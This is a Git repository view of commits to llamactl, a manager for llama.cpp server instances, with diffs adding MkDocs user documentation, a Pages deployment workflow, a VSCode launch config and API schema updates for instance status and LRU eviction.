50 Commits

Author SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
53 changed files with 3154 additions and 880 deletions

65
.github/workflows/docs.yml vendored Normal file
View File

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation
on:
push:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
- '.github/workflows/docs.yml'
pull_request:
branches: [ main ]
paths:
- 'docs/**'
- 'mkdocs.yml'
- 'docs-requirements.txt'
permissions:
contents: read
pages: write
id-token: write
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
with:
fetch-depth: 0 # Needed for git-revision-date-localized plugin
- name: Setup Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: |
pip install -r docs-requirements.txt
- name: Build documentation
run: |
mkdocs build --strict
- name: Upload documentation artifact
if: github.ref == 'refs/heads/main'
uses: actions/upload-pages-artifact@v3
with:
path: ./site
deploy:
if: github.ref == 'refs/heads/main'
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
needs: build
steps:
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v4

19
.vscode/launch.json vendored Normal file
View File

@@ -0,0 +1,19 @@
{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Launch Server",
"type": "go",
"request": "launch",
"mode": "auto",
"program": "${workspaceFolder}/cmd/server/main.go",
"env": {
"GO_ENV": "development",
"LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
},
}
]
}

View File

@@ -129,6 +129,50 @@ Use this format for pull request titles:
- Use meaningful component and variable names - Use meaningful component and variable names
- Prefer functional components over class components - Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help ## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues) - Check existing [issues](https://github.com/lordmathis/llamactl/issues)

105
README.md
View File

@@ -11,11 +11,11 @@
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools) 🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access 🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management 📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Idle Timeout Management**: Automatically stop idle instances after a configurable period **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests 💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts 💾 **State Persistence**: Ensure instances remain intact across server restarts
![Dashboard Screenshot](docs/images/screenshot.png) ![Dashboard Screenshot](docs/images/dashboard.png)
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances **Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations **Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
@@ -113,6 +113,8 @@ instances:
logs_dir: ~/.local/share/llamactl/logs # Logs directory logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited) max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances default_max_restarts: 3 # Max restarts for new instances
@@ -121,7 +123,6 @@ instances:
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes timeout_check_interval: 5 # Idle instance timeout check in minutes
auth: auth:
require_inference_auth: true # Require auth for inference endpoints require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints inference_keys: [] # Keys for inference endpoints
@@ -129,103 +130,7 @@ auth:
management_keys: [] # Keys for management endpoints management_keys: [] # Keys for management endpoints
``` ```
<details><summary><strong>Full Configuration Guide</strong></summary> For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
### Configuration Files
#### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
#### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
</details>
## License ## License

View File

@@ -884,6 +884,10 @@ const docTemplate = `{
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -1018,6 +1022,10 @@ const docTemplate = `{
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1078,8 +1086,7 @@ const docTemplate = `{
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1194,6 +1201,19 @@ const docTemplate = `{
} }
} }
}, },
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": { "instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
@@ -1204,9 +1224,13 @@ const docTemplate = `{
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },

View File

@@ -877,6 +877,10 @@
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -1011,6 +1015,10 @@
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -1071,8 +1079,7 @@
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1187,6 +1194,19 @@
} }
} }
}, },
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": { "instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
@@ -1197,9 +1217,13 @@
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },

View File

@@ -136,6 +136,9 @@ definitions:
type: string type: string
host: host:
type: string type: string
idle_timeout:
description: Idle timeout
type: integer
ignore_eos: ignore_eos:
type: boolean type: boolean
jinja: jinja:
@@ -226,6 +229,9 @@ definitions:
type: boolean type: boolean
numa: numa:
type: string type: string
on_demand_start:
description: On demand start
type: boolean
override_kv: override_kv:
items: items:
type: string type: string
@@ -266,8 +272,7 @@ definitions:
type: number type: number
reranking: reranking:
type: boolean type: boolean
restart_delay_seconds: restart_delay:
description: RestartDelay duration in seconds
type: integer type: integer
rope_freq_base: rope_freq_base:
type: number type: number
@@ -344,6 +349,16 @@ definitions:
yarn_orig_ctx: yarn_orig_ctx:
type: integer type: integer
type: object type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process: instance.Process:
properties: properties:
created: created:
@@ -351,9 +366,10 @@ definitions:
type: integer type: integer
name: name:
type: string type: string
running: status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status description: Status
type: boolean
type: object type: object
server.OpenAIInstance: server.OpenAIInstance:
properties: properties:

4
docs-requirements.txt Normal file
View File

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4

View File

@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model:
```json
{
"name": "llama2-7b",
"model_path": "/path/to/llama-2-7b-chat.gguf",
"options": {
"threads": 4,
"context_size": 2048
}
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new instance
curl -X POST http://localhost:8080/api/instances \
-H "Content-Type: application/json" \
-d '{
"name": "my-model",
"model_path": "/path/to/model.gguf",
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

BIN
docs/images/dashboard.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 47 KiB

41
docs/index.md Normal file
View File

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

View File

@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
